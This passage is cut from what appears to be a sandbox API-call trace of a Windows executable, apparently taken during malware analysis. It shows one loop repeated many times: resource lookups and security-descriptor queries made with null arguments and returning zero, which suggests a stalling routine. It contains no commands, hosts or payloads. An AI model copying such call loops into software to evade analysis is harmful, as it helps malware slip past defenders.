returned 0 [0220.037] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.037] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.037] LockResource (hResData=0x0) returned 0x0 [0220.037] FreeResource (hResData=0x0) returned 0 [0220.037] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.037] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.038] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.038] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.038] LockResource (hResData=0x0) returned 0x0 [0220.038] FreeResource (hResData=0x0) returned 0 [0220.038] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.038] LockResource (hResData=0x0) returned 0x0 [0220.038] FreeResource (hResData=0x0) returned 0 [0220.038] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.038] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.038] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.038] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.038] LockResource (hResData=0x0) returned 0x0 [0220.038] FreeResource (hResData=0x0) returned 0 [0220.038] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.038] LockResource (hResData=0x0) returned 0x0 [0220.038] FreeResource (hResData=0x0) returned 0 [0220.038] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.038] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.038] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.038] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.038] LockResource (hResData=0x0) returned 0x0 [0220.038] FreeResource (hResData=0x0) returned 0 [0220.038] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.038] LockResource (hResData=0x0) returned 0x0 [0220.038] FreeResource (hResData=0x0) returned 0 [0220.038] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.038] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.038] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.038] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.038] LockResource (hResData=0x0) returned 0x0 [0220.038] FreeResource (hResData=0x0) returned 0 [0220.039] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.039] LockResource (hResData=0x0) returned 0x0 [0220.039] FreeResource (hResData=0x0) returned 0 [0220.039] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.039] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.039] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.039] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.039] LockResource (hResData=0x0) returned 0x0 [0220.039] FreeResource (hResData=0x0) returned 0 [0220.039] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.039] LockResource (hResData=0x0) returned 0x0 [0220.039] FreeResource (hResData=0x0) returned 0 [0220.039] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.039] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.039] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.039] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.039] LockResource (hResData=0x0) returned 0x0 [0220.039] FreeResource (hResData=0x0) returned 0 [0220.039] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.039] LockResource (hResData=0x0) returned 0x0 [0220.039] FreeResource (hResData=0x0) returned 0 [0220.039] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.039] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.039] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.039] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.039] LockResource (hResData=0x0) returned 0x0 [0220.039] FreeResource (hResData=0x0) returned 0 [0220.039] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.039] LockResource (hResData=0x0) returned 0x0 [0220.039] FreeResource (hResData=0x0) returned 0 [0220.040] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.040] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.040] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.040] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.040] LockResource (hResData=0x0) returned 0x0 [0220.040] FreeResource (hResData=0x0) returned 0 [0220.040] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.040] LockResource (hResData=0x0) returned 0x0 [0220.040] FreeResource (hResData=0x0) returned 0 [0220.040] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.040] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.040] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.040] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.040] LockResource (hResData=0x0) returned 0x0 [0220.040] FreeResource (hResData=0x0) returned 0 [0220.040] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.040] LockResource (hResData=0x0) returned 0x0 [0220.040] FreeResource (hResData=0x0) returned 0 [0220.040] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.040] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.040] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.040] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.040] LockResource (hResData=0x0) returned 0x0 [0220.040] FreeResource (hResData=0x0) returned 0 [0220.040] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.040] LockResource (hResData=0x0) returned 0x0 [0220.040] FreeResource (hResData=0x0) returned 0 [0220.040] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.040] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.040] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.040] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.041] LockResource (hResData=0x0) returned 0x0 [0220.041] FreeResource (hResData=0x0) returned 0 [0220.041] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.041] LockResource (hResData=0x0) returned 0x0 [0220.041] FreeResource (hResData=0x0) returned 0 [0220.041] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.041] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.041] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.041] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.041] LockResource (hResData=0x0) returned 0x0 [0220.041] FreeResource (hResData=0x0) returned 0 [0220.041] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.041] LockResource (hResData=0x0) returned 0x0 [0220.041] FreeResource (hResData=0x0) returned 0 [0220.041] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.041] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.041] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.041] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.041] LockResource (hResData=0x0) returned 0x0 [0220.041] FreeResource (hResData=0x0) returned 0 [0220.041] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.041] LockResource (hResData=0x0) returned 0x0 [0220.041] FreeResource (hResData=0x0) returned 0 [0220.041] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.041] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.041] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.041] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.041] LockResource (hResData=0x0) returned 0x0 [0220.041] FreeResource (hResData=0x0) returned 0 [0220.041] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.041] LockResource (hResData=0x0) returned 0x0 [0220.042] FreeResource (hResData=0x0) returned 0 [0220.042] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.042] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.042] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.042] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.042] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.042] LockResource (hResData=0x0) returned 0x0 [0220.042] FreeResource (hResData=0x0) returned 0 [0220.042] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.042] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.042] LockResource (hResData=0x0) returned 0x0 [0220.042] FreeResource (hResData=0x0) returned 0 [0220.042] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.042] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.042] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.042] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.042] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.042] LockResource (hResData=0x0) returned 0x0 [0220.042] FreeResource (hResData=0x0) returned 0 [0220.042] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.042] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.042] LockResource (hResData=0x0) returned 0x0 [0220.042] FreeResource (hResData=0x0) returned 0 [0220.042] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.042] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.042] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.042] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.042] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.042] LockResource (hResData=0x0) returned 0x0 [0220.042] FreeResource (hResData=0x0) returned 0 [0220.042] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.042] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.042] LockResource (hResData=0x0) returned 0x0 [0220.042] FreeResource (hResData=0x0) returned 0 [0220.042] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.042] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.042] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.043] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.043] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.043] LockResource (hResData=0x0) returned 0x0 [0220.043] FreeResource (hResData=0x0) returned 0 [0220.043] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.043] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.043] LockResource (hResData=0x0) returned 0x0 [0220.043] FreeResource (hResData=0x0) returned 0 [0220.043] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.043] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.043] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.043] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.043] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.043] LockResource (hResData=0x0) returned 0x0 [0220.043] FreeResource (hResData=0x0) returned 0 [0220.043] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.043] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.043] LockResource (hResData=0x0) returned 0x0 [0220.043] FreeResource (hResData=0x0) returned 0 [0220.043] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.043] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.043] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.043] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.043] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.043] LockResource (hResData=0x0) returned 0x0 [0220.043] FreeResource (hResData=0x0) returned 0 [0220.043] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.043] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.043] LockResource (hResData=0x0) returned 0x0 [0220.043] FreeResource (hResData=0x0) returned 0 [0220.043] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.043] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.043] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.043] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.043] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.043] LockResource (hResData=0x0) returned 0x0 [0220.043] FreeResource (hResData=0x0) returned 0 [0220.043] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.044] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.044] LockResource (hResData=0x0) returned 0x0 [0220.044] FreeResource (hResData=0x0) returned 0 [0220.044] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.044] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.044] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.044] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.044] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.044] LockResource (hResData=0x0) returned 0x0 [0220.044] FreeResource (hResData=0x0) returned 0 [0220.044] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.044] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.044] LockResource (hResData=0x0) returned 0x0 [0220.044] FreeResource (hResData=0x0) returned 0 [0220.044] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.044] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.044] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.044] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.044] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.044] LockResource (hResData=0x0) returned 0x0 [0220.044] FreeResource (hResData=0x0) returned 0 [0220.044] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.044] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.044] LockResource (hResData=0x0) returned 0x0 [0220.044] FreeResource (hResData=0x0) returned 0 [0220.044] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.044] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.044] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.044] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.044] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.044] LockResource (hResData=0x0) returned 0x0 [0220.044] FreeResource (hResData=0x0) returned 0 [0220.044] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.044] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.044] LockResource (hResData=0x0) returned 0x0 [0220.044] FreeResource (hResData=0x0) returned 0 [0220.044] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.045] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.045] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.045] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.045] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.045] LockResource (hResData=0x0) returned 0x0 [0220.045] FreeResource (hResData=0x0) returned 0 [0220.045] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.045] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.045] LockResource (hResData=0x0) returned 0x0 [0220.045] FreeResource (hResData=0x0) returned 0 [0220.045] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.045] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.045] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.045] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.045] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.045] LockResource (hResData=0x0) returned 0x0 [0220.045] FreeResource (hResData=0x0) returned 0 [0220.045] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.045] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.045] LockResource (hResData=0x0) returned 0x0 [0220.045] FreeResource 